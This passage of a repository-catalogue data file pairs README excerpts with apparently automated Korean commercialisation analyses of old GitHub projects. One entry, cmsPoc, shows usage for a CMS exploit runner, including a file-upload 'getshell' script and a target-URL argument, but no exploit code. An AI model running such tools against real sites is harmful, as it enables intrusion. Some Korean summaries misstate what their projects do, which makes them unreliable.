ShawnHymel/tinyml-example-anomaly-detection 분석\n\n## 왜 보물인가\n작은 기계(센서나 IoT 기기)에서 이상 현상을 자동으로 감지하는 기술로, 공장 기계 고장이나 제품 불량을 미리 알아챌 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 제조업체를 위한 \"기계 상태 자동 감시 서비스\" - 월 구독","readme_excerpt":"# TinyML Example: Anomaly Detection\n\nThis project is an example demonstrating how to use Python to train two different machine learning models to detect anomalies in an electric motor. The first model relies on the classic machine learning technique of Mahalanobis distance. The second model is an autoencoder neural network created with TensorFlow and Keras.\n\nData was captured using an ESP32 and MSA301 3-axis accelerometer taped to a ceiling fan. Each sample is about 200 samples of all 3 axes captured over the course of 1 second. Fan was run at multiple speeds (off, low, medium, high) with and without a weight. 1 \"weight\" is one US quarter taped to one of the fan's blades to create an offset motion. All raw data is stored in the ceiling-fan-dataset directory.\n\nNote that if you create a \"robust\" model by moving the fan around during data collection, the Autoencoder works much better than the Mahalanobis Distance method.\n\nThe full articles that explain how these programs work and how to u","composite_score":0.3067,"license_safety_tag":"unknown"},{"name":"CHYbeta/cmsPoc","github_url":"https://github.com/CHYbeta/cmsPoc","stars":13,"language":"Python","license":"unknown","abandonment_months":100,"description":"# CHYbeta/cmsPoc 분석 보고서\n\n## 왜 보물인가\n웹사이트 관리 시스템의 보안 취약점을 실제로 테스트하고 학습할 수 있는 연습용 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 교육 플랫폼**: 기업 직원들이 안전하게 사이버 공격 기법을 배우는 학습 환경\n2. **침투 테스트 도구**: 웹사이트 관리자가 자신의 시스템 약점을 사전에 찾","readme_excerpt":"# Attention\n项目正在重构中：[cmsPoc 2.0](https://github.com/CHYbeta/cmsPoc/tree/2.0)\n\n注意：2.0版本的poc库还未更新相应接口，无法调用。若需使用，建议先使用1.0版本。\n\n# cmsPoc 1.0 \n[![Python 2.7](https://img.shields.io/badge/python-2.7-yellow.svg)](https://www.python.org/)\n![License](https://img.shields.io/badge/license-GPLv2-red.svg)\n\n## Requirements\n- python2.7\n- Works on Linux, Windows\n\n## Usage\n```\nusage: cmspoc.py [-h]\n -t TYPE -s SCRIPT -u URL\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -t TYPE, --type TYPE  e.g.,phpcms\n  -s SCRIPT, --script SCRIPT\n                        Select script\n  -u URL, --url URL     Input a target url\n```\n\n参数说明：\n- -t：指定cms的类型，比如 -t beecms\n- -s：指定要载入的POC脚本，比如 -s v40_fileupload_getshell\n- -u：指定目标cms，比如 -u http://vuln/index.php\n\n## Script\n完整脚本列表请见：[cmsPoc-Wiki：Scripts](https://github.com/CHYbeta/cmsPoc/wiki/Scripts)\n\nFor a complete script list,you can see here: [cmsPoc-Wiki：Scripts](https://github.com/CHYbeta/cmsPoc/wiki/Scripts)\n\n## Examples\n```\npython cmspoc.py -","composite_score":0.3067,"license_safety_tag":"unknown"},{"name":"HarshilShah/DeckTransition","github_url":"https://github.com/HarshilShah/DeckTransition","stars":5,"language":"Swift","license":"mit","abandonment_months":49,"description":"# DeckTransition 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 화면 전환할 때 부드럽고 멋진 효과를 만들어주는 기술로, 사용자 경험을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 프레젠테이션 도구나 슬라이드 앱에서 슬라이드 전환 시 전문적인 애니메이션 효과 제공\n2. **내부 업무 도구**: 기업용 대시","readme_excerpt":"# DeckTransition\n\n[![CI Status](http://img.shields.io/travis/HarshilShah/DeckTransition.svg)](https://travis-ci.org/HarshilShah/DeckTransition)\n[![Version](https://img.shields.io/github/release/HarshilShah/DeckTransition.svg)](https://github.com/HarshilShah/DeckTransition/releases/latest)\n![Package Managers](https://img.shields.io/badge/supports-CocoaPods%20%7C%20Carthage-orange.svg)\n[![Documentation](https://cdn.rawgit.com/HarshilShah/DeckTransition/master/docs/badge.svg)](https://harshilshah.github.com/DeckTransition)\n[![License](https://img.shields.io/badge/license-MIT-999999.svg)](https://github.com/HarshilShah/DeckTransition/blob/master/LICENSE)\n[![Contact](https://img.shields.io/badge/contact-%40HarshilShah1910-3a8fc1.svg)](https://twitter.com/HarshilShah1910)\n\nDeckTransition is an attempt to recreate the card-like transition found in the iOS 10 Apple Music and iMessage apps.\n\nHereʼs a GIF showing it in action.\n\n![Demo](https://raw.githubusercontent.com/HarshilShah/DeckTransition","composite_score":0.3067,"license_safety_tag":"safe"},{"name":"xitu/google-interview-university","github_url":"https://github.com/xitu/google-interview-university","stars":18,"language":"","license":"CC-BY-SA-4.0","abandonment_months":65,"description":"","readme_excerpt":"# Google Interview University\n\nTranslations: \n- [中文版本](translations/README-cn.md)\n- translations in progress:\n    - [Español](https://github.com/jwasham/google-interview-university/issues/80)\n    - [हिन्दी](https://github.com/jwasham/google-interview-university/issues/81)\n    - [עברית](https://github.com/jwasham/google-interview-university/issues/82)\n    - [Bahasa Indonesia](https://github.com/jwasham/google-interview-university/issues/101)\n    - [Arabic](https://github.com/jwasham/google-interview-university/issues/98)\n    - [Vietnamese](https://github.com/jwasham/google-interview-university/issues/92)\n    - [Turkish](https://github.com/jwasham/google-interview-university/issues/90)\n    - [French](https://github.com/jwasham/google-interview-university/issues/89)\n    - [Russian](https://github.com/jwasham/google-interview-university/issues/87)\n    - [Ukrainian](https://github.com/jwasham/google-interview-university/issues/106)\n\n## What is it?\n\nThis is my multi-month study plan for goin","composite_score":0.3066,"license_safety_tag":"unknown"},{"name":"andrew-codechimp/ha-menu","github_url":"https://github.com/andrew-codechimp/ha-menu","stars":6,"language":"Swift","license":"Apache-2.0","abandonment_months":9,"description":"# ha-menu 저장소 분석\n\n## 왜 보물인가\n홈 오토메이션 시스템(Home Assistant)에서 사용자가 쉽게 메뉴를 만들고 관리할 수 있는 도구로, 스마트홈 사용자의 복잡한 조작을 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트홈 설정 대행업체가 고객별 맞춤 메뉴 생성 서비스로 판매\n2. **내부 업무 도구**: Ho","readme_excerpt":"# HA Menu\n\n[![GitHub Release][releases-shield]](releases)\n[![Downloads][download-latest-shield]](Downloads)\n[![License][license-shield]](LICENSE)\n\n![Logo](https://github.com/codechimp-org/ha-menu/blob/master/Art/logo.png)\n\nA MacOS Menu Bar app to perform common Home Assistant functions  \nCurrently HA Menu supports  \n* Turning available switches, lights, automations and input_boolean's on and off\n* Activating scenes, scripts, buttons and input_buttons\n* input_select option menus  \n* Opening and Closing Covers\n* Viewing sensor values (Sensors have to be specifically added to a group)  \n\nHA Menu supports MacOS 11.5 (Big Sur) and later.\n\n![alt text](Art/menu.png \"HA Menu\")\n\n## Installation\n**Manual**  \nGet the latest HA.Menu.zip from [Releases](https://github.com/codechimp-org/ha-menu/releases)  \nUnzip and copy the HA Menu app to your Applications folder\n\n**Homebrew Cask**  \n2.6 or later ```brew install --cask ha-menu```  \n2.5 or earlier ```brew cask install ha-menu```\n\n## Configuration\nYo","composite_score":0.3066,"license_safety_tag":"safe"},{"name":"Heydon/inclusive-design-checklist","github_url":"https://github.com/Heydon/inclusive-design-checklist","stars":22,"language":"JavaScript","license":"unknown","abandonment_months":72,"description":"# Inclusive Design Checklist 분석\n\n## 왜 보물인가\n누구나 쉽게 따라 할 수 있는 웹사이트 접근성 체크리스트로, 장애인도 편하게 이용할 수 있는 디지털 제품을 만드는 데 필요한 모든 것을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n- **웹 접근성 검사 SaaS**: 기업의 웹사이트가 장애인 친화적인지 자동으로 점검하고 보고서를 제","readme_excerpt":"# Inclusive Web Design Checklist\n\nAims to be the **biggest** checklist of inclusive design considerations for the web _ever_. Includes items for accessibility, performance, device support, interoperability, and language. Pull requests welcome!\n\n- [ ] Minify CSS and JS, and remove unused/redundant code [[#1](https://developers.google.com/speed/docs/insights/MinifyResources)] \n- [ ] Maintain terse HTML, without over-reliance on `<div>` scaffolding [[#1](http://designingforperformance.com/optimizing-markup-and-styles/#divitis)] \n- [ ] Use screen reader and keyboard accessible HTML [[#1](https://developer.mozilla.org/en-US/docs/Learn/Accessibility/HTML)] \n- [ ] Compress raster images [[#1](https://www.html5rocks.com/en/tutorials/speed/img-compression/)] \n- [ ] Optimize SVG path data [[#1](https://web-design-weekly.com/2014/10/22/optimizing-svg-web/)] \n- [ ] Make sure heading levels describe a logical section/subsection structure [[#1](https://webaim.org/techniques/semanticstructure/)] \n- [","composite_score":0.3066,"license_safety_tag":"unknown"},{"name":"nanohop/sketch-to-react-native","github_url":"https://github.com/nanohop/sketch-to-react-native","stars":5,"language":"Python","license":"mit","abandonment_months":70,"description":"# sketch-to-react-native 가치 분석\n\n## 왜 보물인가\n손으로 그린 디자인 그림을 자동으로 스마트폰 앱으로 변환해주는 기술로, 앱 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 디자인 SaaS**: 디자이너가 손그림을 업로드하면 자동으로 코드로 변환하는 웹 서비스\n2. **광고·마케팅 에이전시 내부 ","readme_excerpt":"# Convert Sketch files to React Native components\n\n* Sketch App: https://www.sketchapp.com/\n* React Native: https://facebook.github.io/react-native/\n\nDo you have designs in Sketch, and need to turn those into a mobile app?  This will take those designs, and automatically create React Native components.\n\n![Sketch to React Native](images/sketch_to_react_native.png?raw=true)\n\n## Want to try it without installing everything?\n\nSend me your Sketch file and instructions, and I'll run it and email the output back to you: chris@nanohop.com\n\n## Want to collaborate?\n\n[Join us on Slack!](https://join.slack.com/t/design-to-code/shared_invite/enQtMjU5MzQ2OTAzNDEzLWE1MjUzMWVhNzVlNTFlZTFmYmRjODNkNDZmMDI1M2NhMTcwZjgwM2Q5M2Q3OTk5YmNhNTI5MDRmZDk5NmY1MWY)\n\n## Want this as a service?\n\nWe offer that!  We also offer a **human in the loop**, where we'll clean up the output before it goes back to you.  Send me an email to learn more: chris@nanohop.com\n\n*****\n\n# Getting started\n\n### Prerequisites:\n\n* Node 8.5.0","composite_score":0.3065,"license_safety_tag":"safe"},{"name":"gomatcha/matcha","github_url":"https://github.com/gomatcha/matcha","stars":8,"language":"Go","license":"apache-2.0","abandonment_months":94,"description":"# Matcha (gomatcha/matcha) 평가\n\n## 왜 보물인가\n스마트폰 앱과 웹사이트를 동시에 만들 수 있는 기술로, 개발 비용과 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 스타트업이 iOS/Android 앱과 대시보드를 빠르게 출시할 때\n2. **내부 업무 도구**: 회사 내부에서 직","readme_excerpt":"# Matcha - iOS and Android apps in Go\n\n[gomatcha.io](https://gomatcha.io)\n\nMatcha is in early development! There are many rough edges and APIs may still\nchange. Please file issues for any bugs you find.\n\n### What is Matcha?\n\nMatcha is a package for building iOS and Android applications and frameworks in\nGo. Matcha provides a UI component library similar to ReactNative and exposes\nbindings to Objective-C and Java code through reflection. The library also\nprovides Go APIs for common app tasks.\n\n### Examples\n\n[![settings-example](docs/settings.gif)](https://github.com/gomatcha/matcha/tree/master/examples/settings)\n[![insta-example](docs/insta.gif)](https://github.com/gomatcha/matcha/tree/master/examples/insta)\n[![todo-example](docs/todo.gif)](https://github.com/gomatcha/matcha/tree/master/examples/todo)\n\n### Installation - macOS\n\nMatcha requires the following components to be installed.\n\n* Go 1.8+\n* Xcode 8.3+\n* Android Studio 2.3+ (with SDK 26, NDK and Android Support)\n\nStart by installi","composite_score":0.3065,"license_safety_tag":"safe"},{"name":"goreliu/wsl-terminal","github_url":"https://github.com/goreliu/wsl-terminal","stars":6,"language":"Shell","license":"mit","abandonment_months":69,"description":"# wsl-terminal 분석 보고서\n\n## 왜 보물인가\nWindows에서 리눅스 개발 환경을 쉽게 사용할 수 있게 해주는 터미널 도구로, 개발자들의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 개발 환경 플랫폼에 통합하여 웹 브라우저에서 리눅스 터미널을 제공하는 서비스\n2. **내부 업무 ","readme_excerpt":"# wsl-terminal\n\nA terminal emulator for Windows Subsystem for Linux (WSL), based on [mintty](http://mintty.github.io/), [fatty](https://github.com/paolo-sz/fatty) and [wslbridge2](https://github.com/Biswa96/wslbridge2).\n\nAll emojis designed by [OpenMoji](https://openmoji.org/) – the open-source emoji and icon project. License: [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/#)\n\n\n[中文页面](https://mskyaxl.github.io/wsl-terminal/README.zh_CN.html)(The Chinese README is no longer maintained)\n\n## Screenshot\n\n![screenshot](https://raw.githubusercontent.com/wiki/mskyaxl/wsl-terminal/images/wsl-terminal-3.png)\n\nMore screenshots [here](https://github.com/mskyaxl/wsl-terminal/wiki/Screenshots).\n\n## Usage\n\n0. Make sure you have 7z installed. On Ubuntu run: ```sudo apt install p7zip-full```, on Archlinux: run ```pacman -S p7zip```\n\n1. Change the directory to the folder where you want to install wsl-terminal to.\n\nMake sure to install wsl-terminal in a the windows filesystem and not in t","composite_score":0.3064,"license_safety_tag":"safe"},{"name":"fossasia/labyrinth","github_url":"https://github.com/fossasia/labyrinth","stars":12,"language":"JavaScript","license":"AGPL-3.0","abandonment_months":68,"description":"# Labyrinth 저장소 분석\n\n## 왜 보물인가\n미로 같은 복잡한 문제를 체계적으로 풀도록 돕는 도구로, 교육이나 게임, 최적화가 필요한 분야에서 실용적으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 온라인 학교나 학습 사이트가 학생들의 문제 해결 능력을 키우는 퀴즈/게임으로 제공\n2. **내부 업무 도구**: 복잡한 ","readme_excerpt":"<h1 align=\"center\"><center><img src=\"images/logos/inline_color.png\" height=\"100px\"></center></h1>\n\n\n[![Join the chat at https://gitter.im/fossasia/labyrinth](https://badges.gitter.im/fossasia/labyrinth.svg)](https://gitter.im/fossasia/labyrinth?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://travis-ci.org/fossasia/labyrinth.svg?branch=master)](https://travis-ci.org/fossasia/labyrinth)\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/fossasia/labyrinth.svg)](http://isitmaintained.com/project/fossasia/labyrinth \"Average time to resolve an issue\")\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/fossasia/labyrinth.svg)](http://isitmaintained.com/project/fossasia/labyrinth \"Percentage of issues still open\")\n[![license](https://img.shields.io/github/license/fossasia/labyrinth.svg)](LICENSE)\n![GitHub repo size in bytes](https://img.shields.io/github/repo-size/fossasia/labyrinth.svg)\n![W","composite_score":0.3063,"license_safety_tag":"risky"},{"name":"Fooidge/PleaseJS","github_url":"https://github.com/Fooidge/PleaseJS","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":94,"description":"# PleaseJS 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 색상을 자동으로 만들어주는 도구로, 디자인 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 색상 추천 기능이 포함된 온라인 그래픽 디자인 도구 (캔바 같은 서비스)\n2. **내부 업무 도구**: 기업의 브랜드 색상 팔레트를 자동 생성하는 H","readme_excerpt":"#PleaseJS\n\nwww.checkman.io/please\n\nPlease.js is a polite companion that wants to help you make your projects beautiful. It uses HSV color space to create random pleasing colors as well as color schemes based on a given color.\nIt has two core functions and a bunch of little helpers for you to use.\n\n\n```js\nPlease.make_color();\n//or\nPlease.make_scheme(\n{\n\th: 145,\n\ts: .7,\n\tv: .6\n},\n{\n\tscheme_type: 'triadic',\n\tformat: 'rgb-string'\n});\n```\n\n##Core\n\n### make_color\n\n```js\nPlease.make_color({options})\n```\n\nThe make_color function by default will generate and return a random hex string using the golden ratio to ensure that the color will look nice on your screen.\n\nYou can also pass an options object to make_color and have it do a whole bunch of different things.\n\n#### make_color options:\n\n * **hue**: `(0-360)` By setting the hue, you determine the color.\n * **saturation**: `(0.0-1.0)` By setting the saturation, you determine the distance from gray.\n * **value**: `(0.0-1.0)` By setting the value,","composite_score":0.3063,"license_safety_tag":"unknown"},{"name":"kkapuria3/BestBuy-GPU-Bot","github_url":"https://github.com/kkapuria3/BestBuy-GPU-Bot","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":15,"description":"# BestBuy-GPU-Bot 보물 분석\n\n## 왜 보물인가\nGPU(고성능 그래픽칩) 품절 상품을 자동으로 모니터링하고 알려주는 봇으로, 가격이 비싼 이 제품을 제때 구매하기 원하는 사람들에게 큰 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 여러 고객에게 자동 알림 서비스 제공\n2. **내부 업무 도구**","readme_excerpt":"<img src=\"resources/new_logo.gif\">\n\n[![Discord](https://img.shields.io/discord/863863008329596968?color=%237289da%20&label=FOR%20SUPPORT%20AND%20FAQs%20%20%7C%20JOIN%20DISCORD&style=for-the-badge)](https://discord.gg/wkznBbgBFD)\n\n<br>\n\n* **_Works with all/any of the Browsers_**\n\n```\nI took bits from best open and closed sourced bots and made this simple bot.\nPlease star my repo if this contribution helped you ! Its FREEE !\n\n** CREDIT CARD INFORMATION IS NOT USED. BOT WILL ALSO RUN WITHOUT CVV INFORMATION; just not do FINAL CHECKOUT\n\n\nPlease Join Support & FAQ Discord if you have questions.\n\n```\n[<img src=\"https://raw.githubusercontent.com/kkapuria3/FREE-Amazon-BUY-Bot/main/resources/new_logo1.gif\" width=\"350\"/>](https://github.com/kkapuria3/FREE-Amazon-BUY-Bot#readme) [<img src=\"https://raw.githubusercontent.com/kkapuria3/Telegram-To-Discord-Forward-Bot/master/resources/new_logo.gif\" width=\"350\"/>](https://github.com/kkapuria3/Telegram-To-Discord-Forward-Bot#readme)\n\n# BestBuy Bot — Op","composite_score":0.3063,"license_safety_tag":"safe"},{"name":"wuhenzhizao/android-titlebar","github_url":"https://github.com/wuhenzhizao/android-titlebar","stars":6,"language":"Java","license":"unknown","abandonment_months":35,"description":"# android-titlebar 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 상단 제목 표시줄을 쉽게 꾸밀 수 있는 도구로, 앱 개발자들이 반복적으로 작성하던 코드를 간단하게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **안드로이드 앱 개발 플랫폼 SaaS**: 코드 없이 드래그앤드롭으로 제목 표시줄을 디자인할 수 있는 온라인 에디터 제공\n2. *","readme_excerpt":"# CommonTitleBar\n\n开发过程中，如果页面过多，需要构建大量重复的标题栏布局，浪费开发时间且不利于后期维护。本项目总结了几种常用的使用场景，将标题栏封装成控件，Java代码实现，对当前主流的沉浸式提供了支持，供有需要的同学使用，欢迎提供改进意见。\n\n[Demo下载](https://fir.im/qj2a)\n\n功能描述\n=======\n1. 支持左、中、右常规标题栏设置；  \n2. 支持自定义视图；  \n3. 支持沉浸式标题栏；\n\n|首页|快速预览|\n|:---:|:---:|\n|<img src=\"screenshots/titlebar_home.png\" alt=\"screenshot\"  width=\"300\">|<img src=\"screenshots/20171201_182534.gif\" alt=\"screenshot\"  width=\"300\">|\n\n|中间自定义+右边自定义|中间搜索框+左右自定义|\n|:---:|:---:|\n|<img src=\"screenshots/20171201_181956.gif\" alt=\"screenshot\"  width=\"300\">|<img src=\"screenshots/20171201_182034.gif\" alt=\"screenshot\"  width=\"300\">|\n\n使用介绍\n=======\n\n[![Download](https://api.bintray.com/packages/wuhenzhizao/maven/titlebar/images/download.svg) ](https://bintray.com/wuhenzhizao/maven/titlebar/_latestVersion)\n\n添加依赖\n```xml\nbuildscript {\n    allprojects {\n        repositories {\n            jcenter()\n        }\n    }\n}\n\ndependencies {\n    compile 'com.wuhenzhizao:titlebar:1.2.0'\n}\n```\n\n布局中引入控件\n```xml\n<com.wuhenzhizao.titlebar.widget.CommonTitleBar","composite_score":0.3062,"license_safety_tag":"unknown"},{"name":"leejaen/react-lz-editor","github_url":"https://github.com/leejaen/react-lz-editor","stars":5,"language":"JavaScript","license":"mit","abandonment_months":42,"description":"# react-lz-editor 상업화 분석\n\n## 왜 보물인가\n누구나 쉽게 텍스트를 꾸며서 글을 쓸 수 있는 웹 기반 편집 도구로, 블로그, 뉴스레터, 콘텐츠 제작 플랫폼의 핵심 기능이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인 블로그 플랫폼**: 누구나 예쁘게 글을 작성할 수 있는 Medium 같은 서비스\n2. **기업 내부 공지사항 시","readme_excerpt":"```js\n/**\n* 感谢各位对本仓库的star和关注，以及提出的宝贵意见，万分抱歉没有及时跟进issue list，\n* 本仓库最近着手使用ts进行重写，但会保持向下兼容，修复之前出现的问题，增加移动端适配等特性\n*/\n```\n\n[中文](https://github.com/leejaen/react-lz-editor/blob/master/README.cn.md)\n[![npm license](https://img.shields.io/npm/l/awesome-badges.svg)](https://www.npmjs.org/package/awesome-badges)\n\n# react-lz-editor\n\nAn open source react rich-text editor ( mordern react editor includes media support such as texts, images, videos, audios, links etc. ), development based on Draft-Js and Ant-design, good support html, markdown, draft-raw mode. It's supports multiple languages well and welcome you add your language supports.\n\n## Language Contributors\n\n[![Li Zhen](https://avatars3.githubusercontent.com/u/1638970?s=50&v=4)](https://github.com/leejaen) | [![Li Zhen](https://avatars3.githubusercontent.com/u/1638970?s=50&v=4)](https://github.com/leejaen) | [![Boris Chernysh](https://avatars1.githubusercontent.com/u/16339593?s=50&v=4)](https://github.com/borisblack) | [![SibaService.inc](htt","composite_score":0.3062,"license_safety_tag":"safe"},{"name":"google/bottery","github_url":"https://github.com/google/bottery","stars":8,"language":"JavaScript","license":"apache-2.0","abandonment_months":93,"description":"# google/bottery 분석 보고서\n\n## 왜 보물인가\n구글이 만든 챗봇 개발 도구로, 인공지능 기반의 대화형 서비스를 누구나 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 SaaS**: 온라인 쇼핑몰의 24시간 자동 고객 상담 서비스로 월 구독료 수집\n2. **기업 내부 도구**: 직원들이 자연스럽게 대화하듯 업무 처리(휴","readme_excerpt":"# Bottery\n\n## A conversational agent prototyping platform by [Kate Compton](https://github.com/galaxykate).\n\n(This is not an official Google product.)\n\n## What is this?\n\nBottery is a syntax, editor, and simulator for prototyping **generative contextual conversations** modeled as **finite state machines**.\n\nBottery takes inspiration from the **[Tracery](http://tracery.io/)** open-source project for generative text (also by katecompton@ in a non-google capacity) and the [Cheap Bots, Done Quick!](https://cheapbotsdonequick.com/) bot-hosting platform, as well as open FSM-based storytelling tools like Twine.  \n\nLike Tracery, Bottery is a *syntax* that specifies the script of a conversation (a *map*) with JSON.  Like Cheap Bots, Done Quick!, the BotteryStudio can take that JSON and run a simulation of that conversation in a nice JavaScript front-end, with helpful visualizations and editing ability.\n\nThe goal of Bottery is to help *everyone*, from designers to writers to coders, be able to wr","composite_score":0.3061,"license_safety_tag":"safe"},{"name":"hainproject/hain","github_url":"https://github.com/hainproject/hain","stars":7,"language":"JavaScript","license":"mit","abandonment_months":87,"description":"# Hain Project 분석\n\n## 왜 보물인가\n빠르게 프로그램을 실행하고 검색할 수 있는 가벼운 작업 도구로, 매일 컴퓨터를 사용하는 모든 사람의 업무 속도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 업무 효율화 플랫폼으로 제공하여 회사원들의 작업 시간을 단축하는 구독 서비스\n2. **내부 업무 도구**: I","readme_excerpt":"# Hain\n[![Build status](https://ci.appveyor.com/api/projects/status/l4p8r613wckaiqm6?svg=true)](https://ci.appveyor.com/project/appetizermonster/hain)\n[![Build Status](https://travis-ci.org/hainproject/hain.svg)](https://travis-ci.org/hainproject/hain)\n[![Join the chat at https://gitter.im/appetizermonster/hain](https://badges.gitter.im/appetizermonster/hain.svg)](https://gitter.im/appetizermonster/hain?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nAn <kbd>alt</kbd>+<kbd>space</kbd> launcher for Windows, built with Electron.\n\nI always dreamed of an alternative to Alfred on Windows, that is made with JavaScript.\nso, I made it.\n\n<p align=\"center\">\n  <img src=\"docs/images/demo.gif\" width=\"600\"/>\n</p>\n\n## Vision\n\nIt's a launcher with strict syntax (like terminal programs), it's not targeting to interpret natural language.  \nI believe the strict syntax can provide more powerful and fast response than to interpret natural language.\n\n## Features\n\n* Searching Exec","composite_score":0.3061,"license_safety_tag":"safe"},{"name":"alexsosn/iOS_ML","github_url":"https://github.com/alexsosn/iOS_ML","stars":5,"language":"","license":"unknown","abandonment_months":95,"description":"# iOS_ML 저장소 분석\n\n## 왜 보물인가\niPhone에서 직접 인공지능 기능을 작동시킬 수 있는 기술로, 앱 개발자들이 복잡한 클라우드 연결 없이 빠르고 안전하게 스마트한 기능을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **사진 인식 앱 SaaS**: 사용자가 찍은 사진을 자동 분류하고 정리해주는 월 구독 서비스\n2. **기업 문서 ","readme_excerpt":"# Machine Learning for iOS \n\n**Last Update: January 12, 2018.**\n\nCurated list of resources for iOS developers in following topics: \n\n- [Core ML](#coreml)\n- [Machine Learning Libraries](#gpmll)\n- [Deep Learning Libraries](#dll)\n    - [Deep Learning: Model Compression](#dlmc)\n- [Computer Vision](#cv)\n- [Natural Language Processing](#nlp)\n- [Speech Recognition (TTS) and Generation (STT)](#tts)\n- [Text Recognition (OCR)](#ocr)\n- [Other AI](#ai)\n- [Machine Learning Web APIs](#web)\n- [Opensource ML Applications](#mlapps)\n- [Game AI](#gameai)\n- Other related staff\n    - [Linear algebra](#la)\n    - [Statistics, random numbers](#stat)\n    - [Mathematical optimization](#mo)\n    - [Feature extraction](#fe)\n    - [Data Visualization](#dv)\n    - [Bioinformatics (kinda)](#bio)\n    - [Big Data (not really)](#bd)\n- [iOS ML Blogs](#blogs)\n- [Mobile ML books](#books)\n- [GPU Computing Blogs](#gpublogs)\n- [Learn Machine Learning](#learn)\n- [Other Lists](#lists)\n\nMost of the de-facto standard tools in AI-r","composite_score":0.3061,"license_safety_tag":"unknown"},{"name":"keraf/NoCoin","github_url":"https://github.com/keraf/NoCoin","stars":16,"language":"JavaScript","license":"mit","abandonment_months":69,"description":"# NoCoin 저장소 분석\n\n## 왜 보물인가\n암호화폐 채굴로 인한 컴퓨터 악용을 차단하는 솔루션으로, 개인의 컴퓨터를 보호하면서도 정상적인 웹 사용을 방해하지 않습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 보안 SaaS**: 기업의 직원 컴퓨터를 모니터링하고 암호화폐 채굴 악성 프로그램 감지 및 차단 서비스로 제공\n2. **내부 업무 도구**: 중소","readme_excerpt":":warning: Discontinued project :warning:\n> As most browsers have built-in measures to prevent coin mining nowadays and there are more up-to-date lists (see https://github.com/hoshsadiq/adblock-nocoin-list) that work with popular adblockers, this project is not relevant anymore. It served its purpose; protecting users from unwanted coin mining on the web while there was no available alternative, and kickstarting more coin miner blocking intiatives. Thank you for supporting NoCoin and surf safe!\n\n# No Coin\nNo coin is a tiny browser extension aiming to block coin miners such as Coinhive.\n\n![v0.4 demo](https://ker.af/content/images/2017/09/nocoin-v0.4.gif)\n\nYou can grab the extension from: \n\n[![Chrome Web Store](https://developer.chrome.com/webstore/images/ChromeWebStore_BadgeWBorder_v2_206x58.png)](https://chrome.google.com/webstore/detail/no-coin/gojamcfopckidlocpkbelmpjcgmbgjcl) [![FireFox Add-on](https://addons.cdn.mozilla.net/static/img/addons-buttons/AMO-button_1.png)](https://addons","composite_score":0.306,"license_safety_tag":"safe"},{"name":"Microsoft/onnxjs","github_url":"https://github.com/Microsoft/onnxjs","stars":42,"language":"TypeScript","license":"NOASSERTION","abandonment_months":54,"description":"# Microsoft/onnxjs 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 만든 이 기술은 복잡한 인공지능 모델을 웹브라우저에서 직접 빠르게 실행할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹기반 이미지 분석 서비스 (사진 품질 자동 판별, 얼굴 인식 등)\n2. **내부 업무 도구**: 회사 직원들이 사","readme_excerpt":"[![npm version](https://badge.fury.io/js/onnxjs.svg)](https://badge.fury.io/js/onnxjs)\n[![GitHub version](https://badge.fury.io/gh/Microsoft%2Fonnxjs.svg)](https://badge.fury.io/gh/Microsoft%2Fonnxjs)\n[![ONNX.js CI - Windows CPU (Electron)](<https://dev.azure.com/onnxruntime/onnxjs/_apis/build/status/ONNX.js%20CI%20-%20Windows%20CPU%20(Electron)?label=Windows+CPU+(Electron)>)](https://dev.azure.com/onnxruntime/onnxjs/_build/latest?definitionId=24)\n[![ONNX.js CI - Windows CPU (Node.js)](<https://dev.azure.com/onnxruntime/onnxjs/_apis/build/status/ONNX.js%20CI%20-%20Windows%20CPU%20(Node.js)?label=Windows+CPU+(Node.js)>)](https://dev.azure.com/onnxruntime/onnxjs/_build/latest?definitionId=20)\n[![ONNX.js CI - Windows GPU (Chrome,Edge)](<https://dev.azure.com/onnxruntime/onnxjs/_apis/build/status/ONNX.js%20CI%20-%20Windows%20GPU%20(Chrome,Edge)?label=Windows+GPU+(Chrome%2CEdge)>)](https://dev.azure.com/onnxruntime/onnxjs/_build/latest?definitionId=22)\n[![ONNX.js CI - Linux CPU (Node.js)](<","composite_score":0.306,"license_safety_tag":"unknown"},{"name":"quictls/openssl","github_url":"https://github.com/quictls/openssl","stars":7,"language":"C","license":"Apache-2.0","abandonment_months":15,"description":"# OpenSSL (QUIC TLS) 저장소 분석\n\n## 왜 보물인가\n인터넷의 보안 통신을 담당하는 핵심 기술인 OpenSSL에 최신 암호화 프로토콜을 추가한 개선 